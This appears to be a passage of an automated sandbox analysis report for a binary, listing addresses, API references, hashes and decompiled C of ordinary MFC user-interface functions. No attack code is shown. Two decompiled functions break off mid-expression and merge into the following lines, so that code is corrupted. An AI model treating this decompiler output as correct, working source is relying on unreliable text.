0x00cb23a9
0x00cb23aa
0x00cb23ad
0x00cb23af
0x00cb23b2
0x00cb23b4
0x00cb23bf
0x00cb23bf
0x00cb23c0
0x00cb23c5
0x00cb23c7
0x00cb2408
0x00cb240d
0x00cb241f
0x00cb242c
0x00cb23c9
0x00cb23c9
0x00cb23cc
0x00cb23cf
0x00cb23d4
0x00cb23d7
0x00cb23d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb23d9
0x00cb23b6
0x00cb23b6
0x00cb23b9
0x00cb2405
0x00cb2407
0x00cb23bb
0x00cb23bb
0x00cb23bd
0x00cb23db
0x00cb23db
0x00cb23de
0x00cb23e0
0x00cb23e0
0x00cb23e3
0x00cb23e5
0x00cb23f7
0x00cb23ff
0x00cb23e7
0x00cb23e8
0x00cb23e8
0x00cb2401
0x00cb2401
0x00cb2403
0x00cb2403
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb23bd
0x00cb23b9
0x00cb2383
0x00cb2396
0x00cb23a2
0x00cb23a2

APIs

GetCapture.USER32 ref: 00CCE41F
ReleaseCapture.USER32 ref: 00CCE429
GetCapture.USER32 ref: 00CCE44C
ReleaseCapture.USER32 ref: 00CCE456
GetCapture.USER32 ref: 00CCE45F
ReleaseCapture.USER32 ref: 00CCE469

Part of subcall function 00CD1D16: __EH_prolog3_GS.LIBCMT ref: 00CD1D1D
Part of subcall function 00CD1D16: IsRectEmpty.USER32 ref: 00CD1D38
Part of subcall function 00CD1D16: InvertRect.USER32(?,?), ref: 00CD1D4E
Part of subcall function 00CD1D16: SetRectEmpty.USER32(?), ref: 00CD1D61

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Capture$RectRelease$Empty$H_prolog3_Invert
String ID:
API String ID: 4148550730-0
Opcode ID: 572c6b3ea6a16d8af0f271b7b750868b6139c61811942b6ba81fb1b70c826240
Instruction ID: 148d2488da3590ed0cec8f8d32c3cb97e215963bbf468167970239a89b4ac993
Opcode Fuzzy Hash: 572c6b3ea6a16d8af0f271b7b750868b6139c61811942b6ba81fb1b70c826240
Instruction Fuzzy Hash: 3D019231704612AFCB0A9F61DC886ACB775FF45722F14816EE5A6A3250CF306D84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CFF8D7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00CFF8D7(intOrPtr __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t110;
				intOrPtr* _t112;
				intOrPtr _t124;
				intOrPtr* _t130;
				intOrPtr* _t136;
				void* _t137;
				intOrPtr* _t139;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr _t151;
				intOrPtr* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr* _t177;
				intOrPtr* _t178;
				intOrPtr* _t180;
				intOrPtr* _t182;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr _t233;
				intOrPtr _t235;
				void* _t244;
				void* _t249;
				void* _t254;

				_t254 = __fp0;
				_t249 = __eflags;
				_t230 = __edx;
				E00DDD595(0xe0be41, __ebx, __edi, __esi);
				_t232 = __ecx;
				 *((intOrPtr*)(_t244 - 0x18)) = __ecx;
				_t235 =  *((intOrPtr*)(_t244 + 0xc));
				E00D5701D(__ecx, _t249,  *((intOrPtr*)(_t244 + 8)), _t235,  *((intOrPtr*)(_t244 + 0x10)));
				E00D52263(__ebx, _t232, _t235, _t249, _t244 - 0x28, "MFCOutlookBars",  *((intOrPtr*)(_t244 + 8)), 0xb4);
				_t177 = 0;
				 *((intOrPtr*)(_t244 - 4)) = 0;
				if(_t235 == 0xffffffff) {
					_t235 = E00CB7697(_t232);
				}
				E00CA67E1(_t244 - 0x24);
				_t110 = _t244 - 0x24;
				 *((char*)(_t244 - 4)) = 1;
				if( *((intOrPtr*)(_t244 + 0x10)) != 0xffffffff) {
					_push( *((intOrPtr*)(_t244 + 0x10)));
					_push(_t235);
					E00CA6953(_t110, "%TsMFCOutlookBar-%d%x",  *((intOrPtr*)(_t244 - 0x28)));
				} else {
					_push(_t235);
					E00CA6953(_t110, "%TsMFCOutlookBar-%d",  *((intOrPtr*)(_t244 - 0x28)));
				}
				 *((intOrPtr*)(_t244 - 0x30)) = _t177;
				 *((intOrPtr*)(_t244 - 0x38)) = _t177;
				 *((intOrPtr*)(_t244 - 0x34)) = _t177;
				 *((char*)(_t244 - 4)) = 2;
				_t112 = E00D52432(_t244 - 0x38, _t177, 1);
				_t233 =  *((intOrPtr*)(_t244 - 0x24));
				 *((intOrPtr*)(_t244 - 0x14)) = _t112;
				 *0xe17a64(_t233);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x10))))() != 0) {
					 *0xe17a64("MFCOutlookCustomPages", _t244 - 0x30, _t244 - 0x44);
					__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x14)))) + 0x44))))();
					if(__eflags != 0) {
						_t238 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x18)))) + 0x3a0));
						 *0xe17a64();
						_t124 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x18)))) + 0x3a0))))();
						_push(_t177);
						 *((intOrPtr*)(_t244 - 0x2c)) = _t124;
						 *((char*)(_t244 - 4)) = 3;
						E00D792B9(_t177, _t244 - 0xc0, _t233,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x18)))) + 0x3a0)), __eflags);
						 *((char*)(_t244 - 4)) = 4;
						E00CAE222(_t177, _t244 - 0x94, _t233,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x18)))) + 0x3a0)), __eflags, _t244 - 0xc0, 1, 0x1000, _t177,  *((intOrPtr*)(_t244 - 0x30)));
						 *((char*)(_t244 - 4)) = 5;
						 *((intOrPtr*)(_t244 - 0x3c)) = _t177;
						E00CAE449(_t177, _t244 - 0x94, _t233, _t244 - 0x3c,  *((intOrPtr*)(_t244 - 0x44)));
						_t130 = _t177;
						 *((intOrPtr*)(_t244 - 0x20)) = _t177;
						while(1) {
							__eflags = _t130 -  *((intOrPtr*)(_t244 - 0x3c));
							if(_t130 >=  *((intOrPtr*)(_t244 - 0x3c))) {
								break;
							}
							 *((intOrPtr*)(_t244 - 0x1c)) = _t177;
							E00CA67E1(_t244 - 0x40);
							 *((char*)(_t244 - 4)) = 6;
							E00CAE449(_t177, _t244 - 0x94, _t233);
							E00CAA6C6(_t177, _t244 - 0x94, _t230, _t233, _t238, __eflags, _t244 - 0x40, _t244 - 0x1c);
							_t148 = E00CA9583(__eflags, 0x1de0);
							 *((intOrPtr*)(_t244 - 0x14)) = _t148;
							 *((char*)(_t244 - 4)) = 7;
							__eflags = _t148;
							if(__eflags == 0) {
								_t149 = _t177;
								 *((intOrPtr*)(_t244 - 0x14)) = _t177;
							} else {
								_t149 = E00D0010E(_t177, _t148, _t233, _t238, __eflags, _t254);
								 *((intOrPtr*)(_t244 - 0x14)) = _t149;
							}
							 *((char*)(_t244 - 4)) = 6;
							_t151 =  *((intOrPtr*)(_t244 - 0x1c));
							 *((intOrPtr*)(_t244 - 0x1c)) = _t151;
							 *0xe17a64( *((intOrPtr*)(_t244 - 0x18)), 0x50402808, _t151, _t177);
							 *((intOrPtr*)( *((intOrPtr*)( *_t149 + 0x438))))();
							_t154 = E00CB29F1( *((intOrPtr*)(_t244 - 0x18)));
							__eflags = _t154;
							if(__eflags == 0) {
								_t155 = _t177;
							} else {
								_t155 =  *((intOrPtr*)(_t154 + 0x20));
							}
							_t180 =  *((intOrPtr*)(_t244 - 0x14));
							 *((intOrPtr*)(_t180 + 0x5c)) = _t155;
							_t157 =  *((intOrPtr*)(_t244 - 0x1c));
							 *0xe17a64( *((intOrPtr*)(_t244 + 8)), _t157, _t157);
							 *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x22c))))();
							E00CB7F2F( *((intOrPtr*)(_t244 - 0x18)) + 0x388, __eflags, _t180);
							_t238 =  *((intOrPtr*)(_t244 - 0x40));
							 *0xe17a64( *((intOrPtr*)(_t244 - 0x14)),  *((intOrPtr*)(_t244 - 0x40)), 0xffffffff, 1);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x2c)))) + 0x18c))))();
							 *((char*)(_t244 - 4)) = 5;
							 *((char*)( *((intOrPtr*)(_t244 - 0x1c)) -  *0xe6845c + 0xe87d58)) = 1;
							E00CA2975( *((intOrPtr*)(_t244 - 0x1c)) -  *0xe6845c,  *((intOrPtr*)(_t244 - 0x40)) - 0x10);
							_t130 =  *((intOrPtr*)(_t244 - 0x20)) + 1;
							_t177 = 0;
							 *((intOrPtr*)(_t244 - 0x20)) = _t130;
						}
						 *((intOrPtr*)(_t244 - 0x20)) = _t177;
						_push(_t244 - 0x20);
						E00CAE449(_t177, _t244 - 0x94, _t233);
						 *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x2c)) + 0x254)) =  *((intOrPtr*)(_t244 - 0x20));
						E00CAE355(_t244 - 0x94, _t230);
						E00D79316(_t244 - 0xc0);
						_t136 = L00CA95BB( *((intOrPtr*)(_t244 - 0x30)));
						_t178 =  *((intOrPtr*)(_t244 - 0x38));
						__eflags = _t178;
						if(_t178 != 0) {
							 *0xe17a64(1);
							_t136 =  *((intOrPtr*)( *((intOrPtr*)( *_t178 + 4))))();
						}
						_t177 = 1;
						__eflags = 1;
					} else {
						_t136 =  *((intOrPtr*)(_t244 - 0x38));
						__eflags = _t136;
						if(_t136 != 0) {
							 *0xe17a64(1);
							_t136 =  *((intOrPtr*)( *((intOrPtr*)( *_t136 + 4))))();
						}
					}
					_t102 = _t233 - 0x10; // -15
					_t137 = E00CA2975(_t136, _t102);
					__eflags =  *((intOrPtr*)(_t244 - 0x28)) + 0xfffffff0;
					E00CA2975(_t137,  *((intOrPtr*)(_t244 - 0x28)) + 0xfffffff0);
					_t139 = _t177;
				} else {
					_t182 =  *((intOrPtr*)(_t244 - 0x38));
					if(_t182 != 0) {
						 *0xe17a64(1);
						_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t182 + 4))))();
					}
					_t26 = _t233 - 0x10; // -15
					E00CA2975(E00CA2975(_t114, _t26),  *((intOrPtr*)(_t244 - 0x28)) - 0x10);
					_t139 = 0;
				}
				return E00DDD4FA(_t139);
			}

0x00cff8d7
0x00cff8d7
0x00cff8d7
0x00cff8e1
0x00cff8e6
0x00cff8e8
0x00cff8ee
0x00cff8f5
0x00cff906
0x00cff90e
0x00cff910
0x00cff916
0x00cff91f
0x00cff91f
0x00cff924
0x00cff92d
0x00cff930
0x00cff934
0x00cff94a
0x00cff94d
0x00cff957
0x00cff936
0x00cff936
0x00cff940
0x00cff945
0x00cff95f
0x00cff962
0x00cff965
0x00cff96e
0x00cff972
0x00cff977
0x00cff97b
0x00cff985
0x00cff992
0x00cff9df
0x00cff9ea
0x00cff9ec
0x00cffa17
0x00cffa1f
0x00cffa28
0x00cffa2a
0x00cffa34
0x00cffa3a
0x00cffa3e
0x00cffa51
0x00cffa5c
0x00cffa64
0x00cffa6f
0x00cffa72
0x00cffa77
0x00cffa79
0x00cffa7c
0x00cffa7c
0x00cffa7f
0x00000000
0x00000000
0x00cffa88
0x00cffa8b
0x00cffa93
0x00cffa9e
0x00cffaad
0x00cffab7
0x00cffabd
0x00cffac0
0x00cffac4
0x00cffac6
0x00cffad4
0x00cffad6
0x00cffac8
0x00cffaca
0x00cffacf
0x00cffacf
0x00cffadc
0x00cffae8
0x00cffaf4
0x00cffaf7
0x00cffb00
0x00cffb05
0x00cffb0a
0x00cffb0c
0x00cffb13
0x00cffb0e
0x00cffb0e
0x00cffb0e
0x00cffb15
0x00cffb18
0x00cffb25
0x00cffb2d
0x00cffb35
0x00cffb41
0x00cffb49
0x00cffb5e
0x00cffb67
0x00cffb75
0x00cffb79
0x00cffb80
0x00cffb88
0x00cffb89
0x00cffb8b
0x00cffb8b
0x00cffb96
0x00cffb99
0x00cffba0
0x00cffbab
0x00cffbb7
0x00cffbc2
0x00cffbeb
0x00cffbf0
0x00cffbf4
0x00cffbf6
0x00cffc01
0x00cffc09
0x00cffc09
0x00cffc0d
0x00cffc0d
0x00cff9ee
0x00cff9ee
0x00cff9f1
0x00cff9f3
0x00cffa02
0x00cffa0b
0x00cffa0b
0x00cff9f3
0x00cffc0e
0x00cffc11
0x00cffc19
0x00cffc1c
0x00cffc21
0x00cff994
0x00cff994
0x00cff999
0x00cff9a4
0x00cff9ac
0x00cff9ac
0x00cff9ae
0x00cff9bc
0x00cff9c1
0x00cff9c1
0x00cffc28

APIs

__EH_prolog3_catch.LIBCMT ref: 00CFF8E1

Part of subcall function 00D52263: __EH_prolog3.LIBCMT ref: 00D5226A
Part of subcall function 00D52263: _strlen.LIBCMT ref: 00D522A1

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

Strings

MFCOutlookCustomPages, xrefs: 00CFF9DA
%TsMFCOutlookBar-%d%x, xrefs: 00CFF951
%TsMFCOutlookBar-%d, xrefs: 00CFF93A
MFCOutlookBars, xrefs: 00CFF900

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CtrlH_prolog3H_prolog3_catch_strlen
String ID: %TsMFCOutlookBar-%d$%TsMFCOutlookBar-%d%x$MFCOutlookBars$MFCOutlookCustomPages
API String ID: 2041701148-3944741965
Opcode ID: 058824cb639428e9d4ee0c58c9d903f3c8fc58d7b932f5dd38a8420cf9710086
Instruction ID: dff6e7f3e8f57cf46d88026bff7c55431fc8aa7b8216acd596401ed5628c5fe5
Opcode Fuzzy Hash: 058824cb639428e9d4ee0c58c9d903f3c8fc58d7b932f5dd38a8420cf9710086
Instruction Fuzzy Hash: 8AA14A31A00219AFCF00DFA5C995AEDBBB5EF09304F1440A9F916B7291DB30AE45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D245A7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00D245A7(struct HACCEL__* __ebx, struct HACCEL__* __edi, void* __esi, struct tagACCEL* _a4, int _a8, struct HACCEL__* _a12) {
				struct HACCEL__* _v0;
				intOrPtr* _v8;
				char _v12;
				struct HACCEL__* _v16;
				struct HACCEL__* _v20;
				struct HACCEL__* _v24;
				intOrPtr _v44;
				void* __ebp;
				struct HACCEL__* _t68;
				struct HACCEL__* _t69;
				struct HACCEL__* _t74;
				struct HACCEL__* _t77;
				intOrPtr* _t81;
				struct HACCEL__* _t83;
				void* _t89;
				struct HACCEL__* _t90;
				void* _t93;
				struct HACCEL__* _t97;
				intOrPtr* _t101;
				char _t103;
				void* _t109;
				struct HACCEL__* _t110;
				struct HACCEL__* _t112;
				struct HACCEL__* _t113;
				intOrPtr* _t115;
				struct HACCEL__* _t116;
				struct HACCEL__* _t141;
				int _t144;
				struct HACCEL__* _t146;
				void* _t158;
				void* _t160;

				_t141 = __edi;
				_t110 = __ebx;
				_push(__ebx);
				_push(__esi);
				_t146 = _a8;
				_push(__edi);
				if(_t146 == 0) {
					L18:
					E00CAA4E7(_t110, _t115, _t141, _t146, __eflags);
					asm("int3");
					_t158 = _t160;
					__eflags = _v20;
					if(__eflags == 0) {
						L39:
						E00CAA4E7(_t110, _t115, _t141, _t146, __eflags);
						asm("int3");
						_push(_t158);
						__eflags = 0;
						 *_t115 = 0xe258a8;
						 *((intOrPtr*)(_t115 + 4)) = 0;
						 *((intOrPtr*)(_t115 + 0xc)) = 0;
						 *((intOrPtr*)(_t115 + 0x10)) = 0;
						 *((intOrPtr*)(_t115 + 0x14)) = 0;
						 *((intOrPtr*)(_t115 + 0x18)) = _v44;
						 *((intOrPtr*)(_t115 + 8)) = 0x11;
						return _t115;
					} else {
						_push(_t141);
						_t68 = CreateAcceleratorTableA(_a4, _a8);
						_t141 = _t68;
						__eflags = _t141;
						if(_t141 == 0) {
							L34:
							return _t68;
						} else {
							_t69 = _a12;
							_push(_t110);
							_t110 = _v0;
							__eflags = _t110;
							if(_t110 == 0) {
								__eflags = _t69;
								if(__eflags != 0) {
									L37:
									_t116 =  *(_t69 + 0x8c);
									 *(_t69 + 0x8c) = _t141;
									__eflags = _t116;
									if(_t116 != 0) {
										goto L32;
									} else {
										goto L38;
									}
								} else {
									_t69 = E00CACA6C("$?\xef\xbf\xbd", E00CAC659(_t115, _t146, __e									__eflags = _t69;
									if(_t69 == 0) {
										L38:
										DestroyAcceleratorTable(_t141);
										_t68 = 0;
										goto L33;
									} else {
										goto L37;
									}
								}
							} else {
								__eflags = _t69;
								if(__eflags != 0) {
									goto L39;
								} else {
									_t74 =  *(_t110 + 0x8c);
									_v16 = _t74;
									__eflags = _t74;
									if(__eflags == 0) {
										goto L39;
									} else {
										 *(_t110 + 0x8c) = _t141;
										 *0xe17a64(_t146);
										_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t110->i + 0x54))))();
										_v24 = _t77;
										__eflags = _t77;
										if(_t77 != 0) {
											do {
												 *0xe17a64( &_v24);
												_t81 =  *((intOrPtr*)( *((intOrPtr*)(_t110->i + 0x58))))();
												_v12 = _t81;
												 *0xe17a64();
												_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x68))))();
												_v20 = _t83;
												__eflags = _t83;
												if(_t83 != 0) {
													_t112 = _v16;
													do {
														 *0xe17a64( &_v20);
														_t89 = E00CB2A08( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x6c))))());
														__eflags =  *(_t89 + 0x8c) - _t112;
														if( *(_t89 + 0x8c) == _t112) {
															 *(_t89 + 0x8c) = _t141;
														}
														__eflags = _v20;
													} while (_v20 != 0);
													_t110 = _v0;
												}
												__eflags = _v24;
											} while (_v24 != 0);
										}
										_t116 = _v16;
										L32:
										DestroyAcceleratorTable(_t116);
										_t68 = 1;
										__eflags = 1;
										L33:
										goto L34;
									}
								}
							}
						}
					}
				} else {
					_t141 = _a4;
					if(_t141 == 0) {
						_t90 = _a12;
						__eflags = _t90;
						if(__eflags != 0) {
							L16:
							_t113 =  *(_t90 + 0x8c);
							 *(_t90 + 0x8c) = _t146;
							__eflags = _t113;
							if(_t113 != 0) {
								goto L12;
							} else {
								goto L17;
							}
						} else {
							_t90 = E00CACA6C("$?\xef\xbf\xbd", E00CAC659(_t115, _t146, __e							__eflags = _t90;
							if(_t90 == 0) {
								L17:
								_t93 = 0;
							} else {
								goto L16;
							}
						}
						goto L13;
					} else {
						if(_a12 != 0) {
							goto L18;
						} else {
							_t110 =  *(_t141 + 0x8c);
							if(_t110 == 0) {
								goto L18;
							} else {
								 *(_t141 + 0x8c) = _t146;
								 *0xe17a64();
								_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t141->i + 0x54))))();
								_v16 = _t97;
								if(_t97 != 0) {
									do {
										 *0xe17a64( &_v16);
										_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t141->i + 0x58))))();
										_v8 = _t101;
										 *0xe17a64();
										_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x68))))();
										_v12 = _t103;
										if(_t103 != 0) {
											_t144 = _a8;
											do {
												 *0xe17a64( &_v12);
												_t109 = E00CB2A08( *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x6c))))());
												if( *(_t109 + 0x8c) == _t110) {
													 *(_t109 + 0x8c) = _t144;
												}
											} while (_v12 != 0);
											_t141 = _a4;
										}
									} while (_v16 != 0);
								}
								L12:
								DestroyAcceleratorTable(_t113);
								_t93 = 1;
								L13:
								return _t93;
							}
						}
					}
				}
			}

0x00d245a7
0x00d245a7
0x00d245ad
0x00d245ae
0x00d245af
0x00d245b2
0x00d245b5
0x00d246af
0x00d246af
0x00d246b4
0x00d246b6
0x00d246bb
0x00d246bf
0x00d247dd
0x00d247dd
0x00d247e2
0x00d247e3
0x00d247e6
0x00d247e8
0x00d247ee
0x00d247f1
0x00d247f4
0x00d247f7
0x00d247fd
0x00d24802
0x00d2480a
0x00d246c5
0x00d246c5
0x00d246cc
0x00d246d2
0x00d246d4
0x00d246d6
0x00d247a3
0x00d247a5
0x00d246dc
0x00d246dc
0x00d246df
0x00d246e0
0x00d246e3
0x00d246e5
0x00d247a8
0x00d247aa
0x00d247c2
0x00d247c2
0x00d247c8
0x00d247ce
0x00d247d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00d247ac
0x00d247b7
0x00d247be
0x00d247c0
0x00d247d2
0x00d247d3
0x00d247d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00d247c0
0x00d246eb
0x00d246eb
0x00d246ed
0x00000000
0x00d246f3
0x00d246f3
0x00d246f9
0x00d246fc
0x00d246fe
0x00000000
0x00d24704
0x00d24707
0x00d24712
0x00d2471a
0x00d2471c
0x00d2471f
0x00d24721
0x00d24723
0x00d2472e
0x00d24736
0x00d24738
0x00d24742
0x00d2474b
0x00d2474d
0x00d24750
0x00d24752
0x00d24754
0x00d24757
0x00d24765
0x00d24772
0x00d24777
0x00d2477d
0x00d2477f
0x00d2477f
0x00d24785
0x00d24785
0x00d2478b
0x00d2478b
0x00d2478e
0x00d2478e
0x00d24723
0x00d24794
0x00d24798
0x00d24799
0x00d247a1
0x00d247a1
0x00d247a2
0x00000000
0x00d247a2
0x00d246fe
0x00d246ed
0x00d246e5
0x00d246d6
0x00d245bb
0x00d245bb
0x00d245c0
0x00d2467e
0x00d24681
0x00d24683
0x00d2469b
0x00d2469b
0x00d246a1
0x00d246a7
0x00d246a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00d24685
0x00d24690
0x00d24697
0x00d24699
0x00d246ab
0x00d246ab
0x00000000
0x00000000
0x00000000
0x00d24699
0x00000000
0x00d245c6
0x00d245ca
0x00000000
0x00d245d0
0x00d245d0
0x00d245d8
0x00000000
0x00d245de
0x00d245e0
0x00d245eb
0x00d245f3
0x00d245f5
0x00d245fa
0x00d245fc
0x00d24607
0x00d2460f
0x00d24611
0x00d2461b
0x00d24624
0x00d24626
0x00d2462b
0x00d2462d
0x00d24630
0x00d2463e
0x00d2464b
0x00d24656
0x00d24658
0x00d24658
0x00d2465e
0x00d24664
0x00d24664
0x00d24667
0x00d245fc
0x00d2466d
0x00d2466e
0x00d24676
0x00d24677
0x00d2467b
0x00d2467b
0x00d245d8
0x00d245ca
0x00d245c0

APIs

DestroyAcceleratorTable.USER32 ref: 00D2466E

Part of subcall function 00CB2A08: GetParent.USER32(00000000), ref: 00CB2A34

CreateAcceleratorTableA.USER32(00000000,?,?), ref: 00D246CC
DestroyAcceleratorTable.USER32 ref: 00D24799
DestroyAcceleratorTable.USER32 ref: 00D247D3

Strings

$?, xrefs: 00D2468B, 00D247B2

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AcceleratorTable$Destroy$CreateParent
String ID: $?
API String ID: 2271732900-773356789
Opcode ID: 0e4e31a69b082e7169959b52aa84ae4d8d3983b4a881085da81fe612ec5843bd
Instruction ID: c99204754240267ace077df1fe717fe233fd83b7b1b778f5bf49aa25eb27f718
Opcode Fuzzy Hash: 0e4e31a69b082e7169959b52aa84ae4d8d3983b4a881085da81fe612ec5843bd
Instruction Fuzzy Hash: 3E617B35A0022ADFCB14DF65D884AAD77B9AF59719F0880A9E815EB350DB30DE04DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE05D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00CEE05D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t136;
				signed int _t137;
				intOrPtr _t141;
				struct tagRECT* _t156;
				intOrPtr _t172;
				intOrPtr _t183;
				struct tagRECT* _t185;
				signed int _t186;
				intOrPtr _t188;
				void* _t189;
				void* _t190;
				void* _t193;

				_t193 = __fp0;
				_t190 = __eflags;
				_t184 = __edi;
				_push(4);
				E00DDD52C(0xe0b4e0, __ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t189 - 0x10)) = __ecx;
				E00CEDECF(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xe2069c;
				 *((intOrPtr*)(_t189 - 4)) = 0;
				E00CD9F7E(0, __ecx + 0x2b8, __edi, __ecx, _t190);
				 *((char*)(_t189 - 4)) = 1;
				E00CD9F7E(0, _t188 + 0x3d0, __edi, _t188, _t190);
				 *((char*)(_t189 - 4)) = 2;
				E00CD9F7E(0, _t188 + 0x4e8, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 3;
				E00CD9F7E(0, _t188 + 0x600, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 4;
				E00CD9F7E(0, _t188 + 0x718, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 5;
				E00CD9F7E(0, _t188 + 0x830, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 6;
				E00CD9F7E(0, _t188 + 0x948, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 7;
				E00CD9F7E(0, _t188 + 0xa60, _t184, _t188, _t190);
				 *((char*)(_t189 - 4)) = 8;
				 *((intOrPtr*)(_t188 + 0xbac)) = 0;
				 *((intOrPtr*)(_t188 + 0xbc4)) = 0;
				E00D2193A(_t188 + 0xbe0, _t188);
				 *((intOrPtr*)(_t188 + 0xc10)) = 0;
				 *((intOrPtr*)(_t188 + 0xc14)) = 0;
				 *((intOrPtr*)(_t188 + 0xc18)) = 0;
				 *((intOrPtr*)(_t188 + 0xc1c)) = 0;
				 *((intOrPtr*)(_t188 + 0xc20)) = 0;
				 *((intOrPtr*)(_t188 + 0xc24)) = 0;
				 *((intOrPtr*)(_t188 + 0xc28)) = 0;
				 *((intOrPtr*)(_t188 + 0xc2c)) = 0;
				 *((char*)(_t189 - 4)) = 9;
				 *((intOrPtr*)(_t188 + 0xc34)) = 0;
				 *((intOrPtr*)(_t188 + 0xc38)) = 0;
				E00CC0B9E(_t188 + 0xc3c, 0xa);
				 *((char*)(_t189 - 4)) = 0xa;
				E00CC0B9E(_t188 + 0xc58, 0xa);
				 *((char*)(_t189 - 4)) = 0xb;
				E00CC0B9E(_t188 + 0xc74, 0xa);
				 *((char*)(_t189 - 4)) = 0xc;
				E00D7AAD4(_t188 + 0xc90, _t190);
				_t185 = _t188 + 0xccc;
				_t185->left = 0;
				_t185->top = 0;
				_t185->right = 0;
				_t185->bottom = 0;
				_t156 = _t188 + 0xcdc;
				_t156->left = 0;
				_t156->top = 0;
				_t156->right = 0;
				_t156->bottom = 0;
				 *((intOrPtr*)(_t188 + 0xcf0)) = 0;
				 *((intOrPtr*)(_t188 + 0xcec)) = 0xe19640;
				 *(_t188 + 0xcf4) = 0;
				 *(_t188 + 0xcf8) = 0;
				 *(_t188 + 0xcfc) = 0;
				 *(_t188 + 0xd00) = 0;
				E00CEE033(_t188 + 0xd20, 0xa);
				 *((char*)(_t189 - 4)) = 0xf;
				_t136 = E00CC19ED();
				if( *((intOrPtr*)(_t136 + 0x19c)) != 0) {
					 *((char*)(_t188 + 0x24)) = 1;
				}
				_t137 = _t136 | 0xffffffff;
				 *(_t188 + 0xbec) = _t137;
